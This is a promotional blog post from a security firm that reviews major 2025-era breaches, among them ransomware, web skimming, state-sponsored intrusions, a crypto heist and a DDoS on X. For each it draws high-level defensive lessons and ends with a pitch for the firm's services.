March 14, 2025
Take a Look at The Cyber Threat Landscape in 2025 (So Far)
Cyberattacks in 2025 are evolving at an unprecedented pace. With cybercriminals leveraging AI, automation and sophisticated hacking techniques, businesses face an increasingly complex threat landscape.
Recent high-profile breaches, including attacks on government institutions, financial entities and technology firms, highlight the growing risks.
At CyberOne, we believe security is not just about reacting to threats but also about resilience—ensuring businesses can operate securely and efficiently without disruption. While many turn to large consultancies for cyber security, we argue that bigger isn’t always better—but being big enough to be proactive and reactive in times of incidents is essential.
With 20 years in the industry, CyberOne has the agility of a start-up combined with the expertise and reliability of a seasoned cyber security provider. As a CREST-certified SOC, Cyber Incident Response and Penetration Testing provider and an NCSC Cyber Incident Response Assured Service Provider, we adhere to the highest standards in security operations. Our ISO 27001 certification backs this up to ensure robust data protection.
Here, we explore the state of cyberattacks in 2025, the most significant breaches shaping the industry and how businesses can protect themselves with strategic cyber security measures.
The Most Notable Cyberattacks of 2025
The Sarcoma ransomware group, a relatively new but aggressive threat actor, has claimed responsibility for a cyberattack on Unimicron, a leading Taiwanese printed circuit board (PCB) manufacturer. The attackers allege they exfiltrated 377GB of SQL files and sensitive documents, threatening to leak the data if a ransom is not paid.
The breach highlights the increasing risk of ransomware attacks targeting manufacturing and supply chain companies, where operational disruptions can have widespread downstream effects on global technology production.
Cyber Security Issues Identified
- Targeting of Critical Supply Chains — Attackers focus on high-value manufacturing targets where disruptions can impact global electronics production.
- Mass Data Exfiltration — 377GB of stolen data suggests weak data loss prevention (DLP) and inadequate monitoring of sensitive information.
- Ransomware and Extortion Tactics — Attackers leverage public data leaks as additional pressure to force payment, making it harder for companies to recover quietly.
- Vulnerabilities in Industrial IT Infrastructure — The breach indicates potential security gaps in Unimicron’s network segmentation and threat detection capabilities.
Key Security Learnings
- Manufacturing and supply chain companies are becoming primary ransomware targets as attackers seek to disrupt operations and demand high-value ransoms.
- Implementing proactive DLP, network segmentation, and continuous threat monitoring is essential to prevent data exfiltration and limit attack impact.
Security Challenge
💡 If ransomware operators exfiltrated and threatened to leak your company’s sensitive data, would you have the controls in place to detect, contain, and respond before it’s too late?
Southern Water, a major UK water supplier, was targeted by Black Basta ransomware, which led to £4.5 million ($5.7 million) in direct expenses. While the full operational impact remains undisclosed, the breach underscores the financial and operational risks that critical infrastructure providers face when targeted by ransomware.
As essential services become prime targets, the ability to respond swiftly and recover efficiently is crucial to minimizing financial losses and public disruption.
Cyber Security Issues Identified
- Critical Infrastructure at Risk — Water, energy, and other essential service providers remain high-value ransomware targets due to their low tolerance for downtime.
- Significant Financial Impact — Even without paying a ransom, Southern Water incurred millions in response, recovery, and security enhancements.
- Operational Disruptions — While details remain limited, ransomware attacks on utilities can affect billing systems, customer services, and even water supply operations.
- Recovery & Resilience Gaps — The high cost of response suggests limitations in Southern Water’s existing incident response and business continuity planning.
Key Security Learnings
- Ransomware attacks on critical infrastructure can lead to massive financial and operational consequences, even without direct service outages.
- Proactive investment in cyber security, incident response, and resilience strategies can significantly reduce recovery costs and downtime.
Security Challenge
💡 If your organization suffered a ransomware attack today, would your incident response plan minimize financial losses and ensure rapid recovery?
Between January 14 and 24, 2025, the Casio UK online store (casio.co.uk) was compromised by hackers who injected malicious scripts to steal customer payment information. Any customers who made purchases during this period may have had their credit card details and personal data stolen.
This type of attack, commonly called a Magecart or web skimming attack, highlights the ongoing risks e-commerce businesses face when processing customer transactions online.
Cyber Security Issues Identified
- E-Commerce Payment Fraud — Attackers targeted checkout pages to intercept credit card data, exploiting security gaps in web applications.
- Supply Chain Vulnerabilities — Malicious scripts are often injected through third-party services or outdated website components.
- Delayed Detection & Response — The attack went undetected for 10 days, putting thousands of customers at risk.
- Customer Data & Compliance Risks — The theft of personal and financial data raises concerns about GDPR violations and reputational damage.
Key Security Learnings
- E-commerce businesses must continuously monitor their web applications for malicious scripts to prevent customer data theft.
- Regular security assessments and PCI DSS compliance audits help strengthen payment security and detect vulnerabilities before they are exploited.
Security Challenge
💡 If attackers injected malicious code into your online store today, how long would it take for you to detect and stop the theft of customer payment data?
British engineering firm Smiths Group reported a cybersecurity incident involving unauthorized access to its systems, leading to a drop in its stock price by 2.3% in early trading. While details on the attack remain limited, the breach highlights the financial, operational, and reputational risks companies in the engineering and manufacturing sectors face when targeted by cybercriminals.
As critical industries become more digitized, intellectual property, supply chain systems, and operational technology (OT) infrastructure are increasingly at risk.
Cyber Security Issues Identified
- Unauthorized System Access — The lack of disclosed details suggests potential credential theft, insider threats, or external intrusion.
- Financial & Market Impact — The breach caused immediate stock price volatility, showing how cyber security risks can directly affect investor confidence.
- Threats to Engineering & Manufacturing IP — The attack may have exposed sensitive designs, R&D data, or proprietary systems, making the firm a target for corporate espionage.
- Operational Disruption Risks — If left unchecked, Cyberattacks on engineering firms can impact supply chains, project timelines, and industrial control systems (ICS).
Key Security Learnings
- Unauthorized access incidents can quickly escalate into financial, reputational, and operational crises if not contained early.
- Engineering firms must secure their intellectual property, strengthen identity and access controls, and monitor for unauthorized system activity.
Security Challenge
💡 If attackers gained unauthorized access to your systems today, how quickly could you detect, contain, and prevent damage to your business operations and reputation?
In December 2024, Chinese state-sponsored hackers launched a sophisticated cyberattack against the U.S. Department of the Treasury, gaining access to unclassified documents and workstations through vulnerabilities in third-party software.
The attackers remained undetected for weeks, raising concerns about nation-state cyber espionage and the security of government infrastructure.
Cyber Security Issues Identified
- Supply Chain Vulnerabilities — Attackers exploited third-party software weaknesses.
- Insufficient Endpoint Security — Compromised devices were controlled remotely.
- Prolonged Dwell Time — The breach went unnoticed for several weeks, indicating weak monitoring.
Key Security Learnings
State-sponsored attacks are becoming more frequent, making real-time threat detection and continuous monitoring critical. CyberOne’s Microsoft Threat Protection Engagement identifies vulnerabilities and strengthens defences against advanced cyber threats.
Security Challenge
💡Are you confident that third-party software in your environment isn’t exposing you to unseen risks?
A vulnerability in MOVEit file transfer software led to one of the largest cyberattacks in history, affecting thousands of organisations and nearly 100 million individuals. The Russian-linked ransomware group Cl0p exploited the flaw, stealing and leaking sensitive corporate data.
Cyber Security Issues Identified
- Zero-Day Exploitation — The attack targeted a previously unknown vulnerability.
- Supply Chain Weaknesses — Multiple organisations using MOVEit were compromised.
- Inadequate Patch Management — The vulnerability was known for weeks before mitigation efforts were enforced.
Key Security Learnings
Regular vulnerability assessments and rapid patching are essential. CyberOne’s Microsoft Secure Score Rapid Remediation service helps organisations prioritise and fix critical security gaps.
Security Challenge
💡How quickly are you applying security patches and do you have a process to detect vulnerabilities before attackers do?
The Rhysida ransomware group targeted the British Library, demanding a ransom of 20 Bitcoin. When the organisation refused to pay, the attackers leaked 600GB of stolen data, causing significant disruption to library services for months. The attack impacted access to digital resources, internal systems and critical research archives, highlighting the vulnerability of public institutions and cultural organisations to cyber threats.
Cyber Security Issues Identified
- Unprotected Critical Infrastructure — The ransomware attack impacted core services, suggesting insufficient segmentation of critical systems.
- Lack of Proactive Threat Detection — The breach went undetected until systems were encrypted, indicating weak endpoint monitoring and threat response.
- No Ransom Payment, No Data Recovery —The organisation had to rely on backups and manual recovery efforts without a decryption key.
- Sensitive Data Exposure — Leaked information may include employee and operational records, raising potential compliance and privacy concerns.
Key Security Learnings
Ransomware remains a top threat and no public or private industry is immune. Data protection, segmentation and rapid incident response are crucial to minimising downtime and operational disruptions.
Security Challenge
💡If ransomware locked your organisation’s critical systems today, how quickly could you detect, contain and recover?
In early 2025, the Lazarus Group, a North Korean hacker syndicate, orchestrated a $1.5 billion cyber heist on the Bybit cryptocurrency exchange. By exploiting weaknesses in fund transfer protocols, they transferred and laundered digital assets across multiple cryptocurrencies, making tracking and recovery nearly impossible. This attack reinforces the increasing sophistication of financial cybercrime and the vulnerabilities in cryptocurrency platforms.
Cyber Security Issues Identified
- Exploitation of Financial Transaction Flaws — Attackers manipulated fund transfer protocols, demonstrating weak security in transactional workflows.
- Lack of AI-Driven Fraud Detection — The heist went undetected until after assets were lost, indicating a failure in real-time anomaly detection.
- Cross-Border Laundering Techniques — Stolen cryptocurrency was rapidly converted into multiple assets, making tracking difficult for investigators.
- Zero Trust Failures in Access Controls — Attackers likely exploited weak identity verification and privileged access management.
Key Security Learnings
Financial institutions and fintech companies remain prime targets for cybercriminal groups using highly sophisticated attack methods. AI-driven security solutions are essential to detecting unauthorised transactions in real-time.
Security Challenge
💡Would your current fraud detection and access controls prevent attackers from making unauthorised financial transactions?
On 10 March 2025, X (formerly Twitter) suffered a massive cyberattack, causing widespread outages across the platform. While X owner Elon Musk confirmed the attack, he stated that it was carried out by a highly coordinated group or possibly a nation-state actor.
The Dark Storm hacktivist group, a pro-Palestinian collective active since 2023, claimed responsibility for the attack. It launched large-scale DDoS (Distributed Denial-of-Service) attacks, overwhelming X’s infrastructure and forcing the company to implement emergency protections from Cloudflare, which included captcha verification for suspicious traffic.
Cyber Security Issues Identified
- DDoS Resilience Gaps — X suffered prolonged outages, suggesting insufficient mitigation measures for large-scale, resource-intensive attacks.
- Escalating Hacktivist Threats — Politically motivated groups increasingly target critical online platforms with high-impact cyberattacks.
- Real-Time Response Challenges — The attack required immediate intervention, underscoring the need for automated DDoS mitigation and rapid security adjustments.
- Cloudflare Reliance for Emergency Protection — X had to outsource its protection mid-attack, indicating a lack of proactive DDoS defences.
Key Security Learnings
- Hacktivist groups are evolving attack methods, leveraging botnets and automation to disrupt global platforms.
- Organisations must implement proactive DDoS protection to ensure uptime and resilience during large-scale attacks.
Security Challenge
💡 If your organisation was targeted by a large-scale DDoS attack today, could you maintain business operations, or would service disruptions leave you vulnerable?
Between December 2024 and January 2025, the Chinese state-sponsored hacking group Salt Typhoon launched a large-scale cyberattack against global telecommunications providers, breaching over 1,000 Cisco network devices. The attackers exploited unpatched vulnerabilities in Cisco IOS XE software to gain access to telecom infrastructure across the U.S., South America, and India.
According to security researchers, over 12,000 Cisco network devices with exposed web interfaces remain at risk, highlighting the urgent need for patching and stronger network security measures.
Cyber Security Issues Identified
- Unpatched Network Devices — Attackers targeted outdated Cisco IOS XE routers, showing the risks of delayed security updates.
- Widespread Telecom Compromise — More than 1,000 breached devices indicate a coordinated attack on global telecom providers.
- State-Sponsored Cyber Espionage — Salt Typhoon’s campaign aligns with nation-state intelligence gathering efforts, potentially affecting critical communications infrastructure.
- Lack of Network Visibility & Hardening — The number of internet-exposed Cisco devices (12,000+) suggests poor perimeter security and inadequate device monitoring.
Key Security Learnings
- Unpatched network infrastructure remains a top target for cyber espionage—telecom providers must prioritize vulnerability management and proactive patching.
- Implementing zero-trust security, segmenting networks, and monitoring for unauthorized access can prevent attackers from exploiting critical telecom infrastructure.
Security Challenge
💡 Are outdated or unpatched network devices in your environment exposing your organization to state-sponsored cyber threats?
CyberOne: Your Trusted Cyber Security Partner
In an era of relentless and increasingly sophisticated cyber threats, organisations need more than tools—they need a trusted partner to help them assess, strengthen and maintain their security posture. CyberOne combines deep Microsoft expertise, industry-leading accreditations and a proven track record of securing mission-critical environments.
Get Your Free Cyber Security Review
Understanding your Microsoft Secure Score is crucial in identifying and remediating vulnerabilities before attackers exploit them. CyberOne’s Secure Score Rapid Remediation service helps organisations identify and close security gaps, reducing vulnerabilities before they can be exploited.
After your Secure Score review, CyberOne can support your security journey with:
- Professional Services — Cyber risk assessments, penetration testing and compliance-driven security optimisation.
- Managed Security Services — 24×7 threat detection, response and continuous security management.
Book a free 1:1 session with CyberOne to review your Secure Score, uncover security gaps and receive actionable recommendations for improving your resilience.